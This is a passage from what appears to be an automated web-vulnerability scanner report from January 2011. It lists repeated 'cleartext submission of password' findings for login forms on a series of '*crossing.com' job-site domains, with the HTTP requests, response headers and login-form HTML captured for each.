...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.compliancecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.25. http://www.computeraideddesigncrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.computeraideddesigncrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.computeraideddesigncrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:21 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=i4i09jl3sjo0digpp5qe6oqa75; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 121001

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.computeraideddesigncrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.26. http://www.constructioncrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constructioncrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.constructioncrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6c5ho2kr4aaj7if0r37e83a520; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 131637

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.constructioncrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.27. http://www.consultingcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.consultingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.consultingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:22 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=cd981ht9vh5kim10q4v8a0ih67; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111912

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.consultingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.28. http://www.contractmanagementcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.contractmanagementcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.contractmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:33 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=fsi5mhj5680mc16iu88s1m9v73; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:33 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111832

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.contractmanagementcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.29. http://www.counselingcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.counselingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.counselingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=lgk9crdg1goruniholj5urn963; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149300

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.counselingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.30. http://www.cpluspluscrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cpluspluscrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.cpluspluscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:52 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=j0ddtd9qvkbq5g8p17jjmqsi44; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114789

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.cpluspluscrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.31. http://www.customerservicecrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.customerservicecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.customerservicecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:04 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=e126ahin8nno4266rg114hr8q7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:05 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119384

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.customerservicecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.32. http://www.dbacrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dbacrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.dbacrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:08 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ks0hq7i64reib4jv7s3j12ces0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125721

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.dbacrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.33. http://www.dentalcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dentalcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.dentalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:08 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=od1eunkj1a6cadocmt8bfbgt55; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111827

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.dentalcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.34. http://www.designingcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.designingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.designingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:17 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3h4obslpuiqaf86r78fndl2ip2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:17 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122676

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.designingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.35. http://www.diversitycrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.diversitycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.diversitycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:25 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=oh70k7g7bb01l9sdpsaq85rgq4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:25 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 135908

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.diversitycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.36. http://www.dotnetcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dotnetcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.dotnetcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:28 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=r5bbu9cr0v14lapurelqu9r7t1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:28 GMT
Connection: close
Via: 1.1 AN-0016020122545304
